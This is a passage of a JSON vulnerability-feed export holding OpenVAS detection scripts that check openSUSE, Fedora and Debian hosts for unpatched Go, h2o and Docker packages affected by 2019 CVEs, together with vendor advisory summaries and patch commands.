value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-09-03 02:03:45 +0000 (Tue, 03 Sep 2019)\");\n script_name(\"openSUSE: Security Advisory for go1.12 (openSUSE-SU-2019:2056-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:2056-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-09/msg00002.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'go1.12'\n package(s) announced via the openSUSE-SU-2019:2056-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for go1.12 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2019-9512: Fixed HTTP/2 flood using PING frames that results in\n unbounded memory growth (bsc#1146111).\n\n - CVE-2019-9514: Fixed HTTP/2 implementation that is vulnerable to a reset\n flood, potentially leading to a denial of service (bsc#1146115).\n\n - CVE-2019-14809: Fixed malformed hosts in URLs that leads to\n authorization bypass (bsc#1146123).\n\n Bugfixes:\n\n - Update to go version 1.12.9 (bsc#1141689).\n\n - Adding Web Assembly stuff from misc/wasm (bsc#1139210).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-2056=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-2056=1\");\n\n script_tag(name:\"affected\", value:\"'go1.12' package(s) on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"go1.12\", rpm:\"go1.12~1.12.9~lp150.8.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"go1.12-doc\", rpm:\"go1.12-doc~1.12.9~lp150.8.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"go1.12-race\", rpm:\"go1.12-race~1.12.9~lp150.8.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-31T16:51:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-09-06T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for go1.11 (openSUSE-SU-2019:2072-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-14809", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852691", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852691", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852691\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-14809\", \"CVE-2019-9512\", \"CVE-2019-9514\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-09-06 02:00:56 +0000 (Fri, 06 Sep 2019)\");\n script_name(\"openSUSE: Security Advisory for go1.11 (openSUSE-SU-2019:2072-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:2072-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-09/msg00011.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'go1.11'\n package(s) announced via the openSUSE-SU-2019:2072-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for go1.11 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2019-9512: Fixed HTTP/2 flood using PING frames that results in\n unbounded memory growth (bsc#1146111).\n\n - CVE-2019-9514: Fixed HTTP/2 implementation that is vulnerable to a reset\n flood, potentially leading to a denial of service (bsc#1146115).\n\n - CVE-2019-14809: Fixed malformed hosts in URLs that leads to\n authorization bypass (bsc#1146123).\n\n Bugfixes:\n\n - Update to go version 1.11.13 (bsc#1141688).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-2072=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-2072=1\");\n\n script_tag(name:\"affected\", value:\"'go1.11' package(s) on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"go1.11\", rpm:\"go1.11~1.11.13~lp150.18.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"go1.11-doc\", rpm:\"go1.11-doc~1.11.13~lp150.18.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"go1.11-race\", rpm:\"go1.11-race~1.11.13~lp150.18.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-09-10T14:49:12", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-09-07T00:00:00", "type": "openvas", "title": "Fedora Update for golang FEDORA-2019-55d101a740", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-14809", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2019-09-10T00:00:00", "id": "OPENVAS:1361412562310876757", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876757", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876757\");\n script_version(\"2019-09-10T08:05:24+0000\");\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\", \"CVE-2019-14809\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-09-10 08:05:24 +0000 (Tue, 10 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-09-07 02:23:49 +0000 (Sat, 07 Sep 2019)\");\n script_name(\"Fedora Update for golang FEDORA-2019-55d101a740\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-55d101a740\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LYO6E3H34C346D2E443GLXK7OK6KIYIQ\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'golang'\n package(s) announced via the FEDORA-2019-55d101a740 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Go Programming Language.\");\n\n script_tag(name:\"affected\", value:\"'golang' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"golang\", rpm:\"golang~1.12.9~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-27T12:51:07", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-08-27T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4508-1 (h2o - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-9515", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2019-08-27T00:00:00", "id": "OPENVAS:1361412562310704508", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704508", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704508\");\n script_version(\"2019-08-27T02:00:16+0000\");\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\", \"CVE-2019-9515\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-08-27 02:00:16 +0000 (Tue, 27 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-27 02:00:16 +0000 (Tue, 27 Aug 2019)\");\n script_name(\"Debian Security Advisory DSA 4508-1 (h2o - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB10\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4508.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4508-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'h2o'\n package(s) announced via the DSA-4508-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Three vulnerabilities were discovered in the HTTP/2 code of the H2O HTTP\nserver, which could result in denial of service.\");\n\n script_tag(name:\"affected\", value:\"'h2o' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (buster), these problems have been fixed in\nversion 2.2.5+dfsg2-2+deb10u1.\n\nWe recommend that you upgrade your h2o packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"h2o\", ver:\"2.2.5+dfsg2-2+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"h2o-doc\", ver:\"2.2.5+dfsg2-2+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libh2o-dev\", ver:\"2.2.5+dfsg2-2+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libh2o-dev-common\", ver:\"2.2.5+dfsg2-2+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libh2o-evloop-dev\", ver:\"2.2.5+dfsg2-2+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libh2o-evloop0.13\", ver:\"2.2.5+dfsg2-2+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libh2o0.13\", ver:\"2.2.5+dfsg2-2+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-31T16:51:06", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-08-30T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for containerd, docker, docker-runc, go, go1.11, go1.12, golang-github-docker-libnetwork (openSUSE-SU-2019:2021-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10892", "CVE-2019-13509", "CVE-2019-14271", "CVE-2019-5736"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852679", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852679", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852679\");\n script_version(\"2020-01-31T08:13:19+0000\");\n script_cve_id(\"CVE-2018-10892\", \"CVE-2019-13509\", \"CVE-2019-14271\", \"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:13:19 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-08-30 02:00:50 +0000 (Fri, 30 Aug 2019)\");\n script_name(\"openSUSE: Security Advisory for containerd, docker, docker-runc, go, go1.11, go1.12, golang-github-docker-libnetwork (openSUSE-SU-2019:2021-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:2021-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-08/msg00084.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'containerd, docker, docker-runc,\n go, go1.11, go1.12, golang-github-docker-libnetwork' package(s) announced via the openSUSE-SU-2019:2021-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for containerd, docker, docker-runc,\n golang-github-docker-libnetwork fixes the following issues:\n\n Docker:\n\n - CVE-2019-14271: Fixed a code injection if the nsswitch facility\n dynamically loaded a library inside a chroot (bsc#1143409).\n\n - CVE-2019-13509: Fixed an information leak in the debug log (bsc#1142160).\n\n - Update to version 19.03.1-ce, see changelog at\n /usr/share/doc/packages/docker/CHANGELOG.md (bsc#1142413, bsc#1139649).\n\n runc:\n\n - Use %config(noreplace) for /etc/docker/daemon.json (bsc#1138920).\n\n - Update to runc 425e105d5a03, which is required by Docker (bsc#1139649).\n\n containerd:\n\n - CVE-2019-5736: Fixed a container breakout vulnerability (bsc#1121967).\n\n - Update to containerd v1.2.6, which is required by docker (bsc#1139649).\n\n golang-github-docker-libnetwork:\n\n - Update to version git.fc5a7d91d54cc98f64fc28f9e288b46a0bee756c, which is\n required by docker (bsc#1142413, bsc#1139649).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-2021=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-2021=1\");\n\n script_tag(name:\"affected\", value:\"'containerd, ' package(s) on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"containerd\", rpm:\"containerd~1.2.6~lp150.4.17.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"containerd-ctr\", rpm:\"containerd-ctr~1.2.6~lp150.4.17.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker\", rpm:\"docker~19.03.1_ce~lp150.5.27.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-debuginfo\", rpm:\"docker-debuginfo~19.03.1_ce~lp150.5.27.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-libnetwork\", rpm:\"docker-libnetwork~0.7.0.1+gitr2800_fc5a7d91d54c~lp150.3.18.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-libnetwork-debuginfo\", rpm:\"docker-libnetwork-debuginfo~0.7.0.1+gitr2800_fc5a7d91d54c~lp150.3.18.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc\", rpm:\"docker-runc~1.0.0rc8+gitr3826_425e105d5a03~lp150.5.25.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-debuginfo\", rpm:\"docker-runc-debuginfo~1.0.0rc8+gitr3826_425e105d5a03~lp150.5.25.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-test\", rpm:\"docker-test~19.03.1_ce~lp150.5.27.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-test-debuginfo\", rpm:\"docker-test-debuginfo~19.03.1_ce~lp150.5.27.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"golang-github-docker-libnetwork\", rpm:\"golang-github-docker-libnetwork~0.7.0.1+gitr2800_fc5a7d91d54c~lp150.3.18.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-bash-completion\", rpm:\"docker-bash-completion~19.03.1_ce~lp150.5.27.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-zsh-completion\", rpm:\"docker-zsh-completion~19.03.1_ce~lp150.5.27.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-09T12:31:36", "description": "In Docker linked against the GNU C Library (aka glibc), code injection can\n occur when the nsswitch facility dynamically loads a library inside a chroot that contains the contents of the\n container.", "cvss3": {}, "published": "2019-07-31T00:00:00", "type": "openvas", "title": "Docker 19.03.0 Code Injection Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-14271"], "modified": "2019-08-09T00:00:00", "id": "OPENVAS:1361412562310142683", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142683", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = 'cpe:/a:docker:docker';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142683\");\n script_version(\"2019-08-09T06:43:03+0000\");\n script_tag(name:\"last_modification\", value:\"2019-08-09 06:43:03 +0000 (Fri, 09 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-07-31 06:14:45 +0000 (Wed, 31 Jul 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2019-14271\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Docker 19.03.0 Code Injection Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_docker_remote_detect.nasl\", \"gb_docker_service_detection_lsc.nasl\");\n script_mandatory_keys(\"docker/version\");\n\n script_tag(name:\"summary\", value:\"In Docker linked against the GNU C Library (aka glibc), code injection can\n occur when the nsswitch facility dynamically loads a library inside a chroot that contains the contents of the\n container.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"Docker version 19.03.0.\");\n\n script_tag(name:\"solution\", value:\"Update to version 19.03.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://docs.docker.com/engine/release-notes/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE, nofork: TRUE))\n exit(0);\n\nif (version_is_equal(version: version, test_version: \"19.03.0\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"19.03.1\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-11T18:39:42", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-10-10T00:00:00", "type": "openvas", "title": "Fedora Update for golang FEDORA-2019-416d20f960", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-16276", "CVE-2019-14809", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2019-10-11T00:00:00", "id": "OPENVAS:1361412562310876892", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876892", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876892\");\n script_version(\"2019-10-11T07:39:42+0000\");\n script_cve_id(\"CVE-2019-16276\", \"CVE-2019-14809\", \"CVE-2019-9514\", \"CVE-2019-9512\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-11 07:39:42 +0000 (Fri, 11 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-10-10 02:23:04 +0000 (Thu, 10 Oct 2019)\");\n script_name(\"Fedora Update for golang FEDORA-2019-416d20f960\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", 